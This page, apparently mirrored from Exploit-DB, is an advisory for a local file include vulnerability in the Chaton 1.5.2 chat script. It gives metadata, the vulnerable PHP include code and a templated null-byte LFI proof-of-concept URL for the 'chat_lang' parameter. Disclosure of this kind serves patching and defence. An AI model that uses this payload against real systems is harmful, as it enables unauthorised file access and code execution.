Chaton - exploit.company

vendor:

Chaton

by:

cr4wl3r

7,5

CVSS

HIGH

Local File Include

CWE

Product Name: Chaton

Affected Version From: 1.5.2

Affected Version To: 1.5.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:easy-script:chaton

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Chaton <= 1.5.2 Local File Include Vulnerability

Chaton version 1.5.2 is vulnerable to a Local File Include vulnerability. This vulnerability is caused due to the improper validation of user-supplied input in the 'chat_lang' parameter in the 'deplacer.php' script. An attacker can exploit this vulnerability to include local files and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Chaton.

Source

Exploit-DB raw data:

[+] Chaton <= 1.5.2 Local File Include Vulnerability
[+] Discovered By: cr4wl3r
[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip
[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

    if (file_exists( "lang/$chat_lang/deplacer.php")) {
        include( "lang/$chat_lang/deplacer.php");
    }

    if ($chat_salon != $newsalon) {
        if ($chat_hide == false) {
            // Salle publique = Recupere le vrai nom
            $nomsalle = NomSalonPublic( $newsalon);
            if ($nomsalle == '') {
                // Salon priv�
                $salon_prive = true;
                $nomsalle = $newsalon;
            } else {
                $salon_prive = false;
            }

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]